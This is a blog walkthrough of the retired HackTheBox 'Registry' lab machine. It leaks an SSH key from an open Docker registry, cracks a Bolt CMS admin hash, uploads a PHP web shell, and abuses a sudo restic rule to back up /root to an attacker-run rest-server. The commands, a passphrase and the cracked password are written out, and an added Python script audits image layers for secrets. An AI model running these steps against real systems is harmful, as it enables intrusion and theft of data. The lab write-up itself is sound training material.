HackTheBox - Registry

Summary

Registry, a Linux box created by HackTheBox user thek, was an overall medium to hard difficulty box. The initial enumeration exposes a Docker registry from which you can download an image containing an SSH key for the user. SSHing into the box, we find an nginx config that points us to the Bolt database. Cracking the password in the Bolt DB gives us access to the Bolt web interface, where we can upload a p0wny shell and get the www-data user, which is allowed to run restic backup as root. Using that we get root.

Enumeration

# Nmap 7.80 scan initiated Wed Nov  6 23:00:12 2019 as: nmap -sC -sV -oN nmap/registry 10.10.10.159
Nmap scan report for 10.10.10.159
Host is up (0.15s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 72:d4:8d:da:ff:9b:94:2a:ee:55:0c:04:30:71:88:93 (RSA)
| 256 c7:40:d0:0e:e4:97:4a:4f:f9:fb:b2:0b:33:99:48:6d (ECDSA)
|_ 256 78:34:80:14:a1:3d:56:12:b4:0a:98:1f:e6:b4:e8:93 (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Welcome to nginx!
443/tcp open ssl/http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Welcome to nginx!
| ssl-cert: Subject: commonName=docker.registry.htb
| Not valid before: 2019-05-06T21:14:35
|_Not valid after: 2029-05-03T21:14:35
8000/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Nov 6 23:00:34 2019 -- 1 IP address (1 host up) scanned in 22.58 seconds

Adding docker.registry.htb (taken from the certificate) and visiting it, we see it is a Docker registry. This reminded me of a blog post I read which shows why we should always have authenticated APIs.

Following that blog post, we leak information by visiting

https://docker.registry.htb/v2/_catalog
https://docker.registry.htb/v2/bolt-image/tags/list
https://docker.registry.htb/v2/bolt-image/manifests/latest

and we can download the image blobs. Extracting them (each blob is just a tar file) and going through the image contents, we find an id_rsa key for the user bolt.

Enumerating further, we see /etc/profile.d/01-ssh.sh referenced in .bash_history; viewing that file gives us the passphrase for the key: GkOcz221Ftb3ugog.
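As an added example (not part of this writeup), here is a small Python audit that does what this section does by hand, but from the registry operator's side: it reads the manifest from the v2 API, pulls each layer blob and scans it for private keys and passphrases, so a leak like the one above can be caught before an image is pushed or when reviewing an exposed registry. The base URL, repository name and the sample layer contents are assumptions; it uses only the standard library and verifies TLS, so a self-signed registry certificate like this box's has to be trusted first.

```python
import io, json, re, tarfile, urllib.request

SECRET_PATTERNS = {  # things an image layer should never carry; labels are reported back
    "private key": re.compile(rb"-----BEGIN (?:RSA |OPENSSH |EC |DSA )?PRIVATE KEY-----"),
    "passphrase": re.compile(rb"(?i)passphrase\s*[=:]\s*\S+"),
}

def layer_digests(manifest: dict) -> list:
    """Layer digests from a v2 manifest: schema2 uses 'layers', schema1 uses 'fsLayers'."""
    if "layers" in manifest:
        return [layer["digest"] for layer in manifest["layers"]]
    return [layer["blobSum"] for layer in manifest.get("fsLayers", [])]

def scan_layer(layer_bytes: bytes) -> list:
    """Walk one (gzip or plain) tar layer and return a (path, label) pair for every hit."""
    findings = []
    with tarfile.open(fileobj=io.BytesIO(layer_bytes), mode="r:*") as tar:
        for member in tar:
            if not member.isfile():
                continue
            data = tar.extractfile(member).read()
            for label, pattern in SECRET_PATTERNS.items():
                if pattern.search(data):
                    findings.append((member.name, label))
    return findings

def audit_repo(base_url: str, repo: str, tag: str = "latest") -> list:
    """Fetch base_url/v2/<repo>/manifests/<tag>, then scan every layer blob (needs network)."""
    req = urllib.request.Request(f"{base_url}/v2/{repo}/manifests/{tag}",
                                 headers={"Accept": "application/vnd.docker.distribution.manifest.v2+json"})
    with urllib.request.urlopen(req, timeout=15) as resp:
        manifest = json.load(resp)
    hits = []
    for digest in layer_digests(manifest):
        with urllib.request.urlopen(f"{base_url}/v2/{repo}/blobs/{digest}", timeout=120) as blob:
            hits += [(digest, path, label) for path, label in scan_layer(blob.read())]
    return hits

def build_sample_layer() -> bytes:
    """Constructed gzip tar layer: a benign file, a profile script holding a passphrase, a key."""
    files = {
        "etc/motd": b"welcome\n",
        "etc/profile.d/01-ssh.sh": b'#!/bin/sh\nexport SSH_PASSPHRASE="not-a-real-secret"\n',
        "root/.ssh/id_rsa": b"-----BEGIN OPENSSH PRIVATE KEY-----\nQ09OU1RSVUNURUQ=\n-----END OPENSSH PRIVATE KEY-----\n",
    }
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, data in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()
```

scan_layer(build_sample_layer()) flags the profile script and the key but not etc/motd; audit_repo(base_url, repo) returns one (digest, path, label) tuple per hit across a real repository.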

User Shell

With the above creds we can SSH in as bolt and grab user.txt.

Enumerating the box, we don't see any direct path from bolt to root.

Looking for something interesting, we see Bolt CMS running at registry.htb/bolt.
Turns out there is a lovely hash waiting for us in /var/www/html/bolt/app/database (as bolt@bolt). Opening bolt.db reveals this:

admin$2y$10$e.ChUytg9SrL7AsboF2bX.wWKQ1LkS5Fi3/Z0yYD86.P5E9cpY7PKbolt@registry.htb

Cracking that hash we get the password strawberry.

Getting www-data

Log in to the page with admin:strawberry.
I found this about Bolt CMS: https://fgsec.net/from-csrf-to-rce-bolt-cms/

So basically, I can add php to the accepted file extensions and upload my PHP shell.

Doing that and uploading a p0wny shell gets us a web shell as www-data.

Privilege Escalation

Running sudo -l shows us that www-data can run:

Matching Defaults entries for www-data on bolt:
env_reset, exempt_group=sudo, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on bolt:
(root) NOPASSWD: /usr/bin/restic backup -r rest*

Looking up restic, we see it is a backup program. The rest* wildcard in the sudo rule means we can point it at any rest: repository URL we choose.

The first thing that came to mind is to create a backup of /root/ and push it to our rogue server, then restore it there.

Let's do that then.

To do that we need to install restic on our box and create an empty repository.

We also need rest-server to listen for the incoming snapshot.

Let's initialize the restic repository with:
restic init --repo .

Create a restic server with:
./rest-server-0.9.7-linux-amd64 --log --private-repos --path .

But we need to set up port forwarding first so we can transfer the snapshot:

ssh -R 127.0.0.1:8000:127.0.0.1:8000 -i ./loot/docker-bolt/id_rsa bolt@10.10.10.159

Transfer the backup with

echo password | sudo restic backup -r rest:http://127.0.0.1:8000 /root

from the p0wny shell.

Restore the snapshot using

restic restore -r rest:http://localhost:8000 8a9229d6 --target .

We get root's private key and root.txt, which proves we have pwned this box.

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/registry/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.